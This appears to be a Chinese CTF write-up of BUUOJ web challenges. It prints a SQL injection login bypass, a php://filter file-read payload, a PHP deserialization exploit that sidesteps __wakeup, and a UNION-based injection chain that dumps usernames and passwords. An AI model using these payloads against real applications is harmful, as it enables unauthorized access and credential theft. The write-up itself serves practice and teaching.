EasySQL

尝试了一下空格,or,'等发现没有过滤然后试了个万能密码 1' or '1…就出来了???。。。

可能是buuoj环境搭建错了吧。。

image-20200228233257113

看了看别的大佬的博客

image-20200228233505543

emmm,确实就这么个样。。过过过。。

Havefun

image-20200229012414004

页面上什么都没有,页面源码有注释

1
2
3
4
5
$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
	echo 'Syc{cat_cat_cat_cat}';
}

输入URL/?cat=dog然后。。。flag又出来了

image-20200229012909489

Secret File

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
 <html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

直接输入flag提示看不到,尝试用filter伪协议读取

secr3t.php?file=php://filter/read=convert.base64-encode/resource=./flag.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<!DOCTYPE html>

<html>

    <head>
        <meta charset="utf-8">
        <title>FLAG</title>
    </head>

    <body style="background-color:black;"><br><br><br><br><br><br>
        
        <h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
        
        <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
            <?php
                echo "我就在这里";
                $flag = 'flag{c22446be-2016-4ec1-9a76-d3e06a6e98b3}';
                $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
            ?>
        </p>
    </body>

</html>

flag在里面

PHP

image-20200306083942851

www.zip

index.php关键代码

1
2
3
4
5
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize($select);
?>

class.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();  
        }
    }
}

构造饭序列化字符串,更改对象数量绕过_wakeup函数即可

exp.php

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
class Name{
    private $username='admin';
    private $password='100';
}
$o = new Name();
var_dump(serialize($o));
var_dump(urlencode(serialize($o)));

?>
O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D
    修改
O%3A4%3A%22Name%22%3A2%  4  A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D

LoveSQL

测试admin' or '1成了,报错注入

1
2
3
4
5
6
7
8
9
10
11
admin' order by 3#
-1' union select 1,2,database()#
geek
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
geekuser,l0ve1ysq1
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
id,username,password
-1' union select 1,2,group_concat(username) from l0ve1ysq1#
'cl4y,glzjin,Z4cHAr7zCr,0xC4m3l,Ayrain,Akko,fouc5,fouc5,fouc5,fouc5,fouc5,fouc5,fouc5,fouc5,leixiao,flag'
-1' union select 1,2,group_concat(password) from l0ve1ysq1#
'wo_tai_nan_le,glzjin_wants_a_girlfriend,biao_ge_dddd_hm,linux_chuang_shi_ren,a_rua_rain,yan_shi_fu_de_mao_bo_he,cl4y,di_2_kuai_fu_ji,di_3_kuai_fu_ji,di_4_kuai_fu_ji,di_5_kuai_fu_ji,di_6_kuai_fu_ji,di_7_kuai_fu_ji,di_8_kuai_fu_ji,Syc_san_da_hacker,flag{afcdcab8-ff94-4803-a558-0aa5d83284d0}'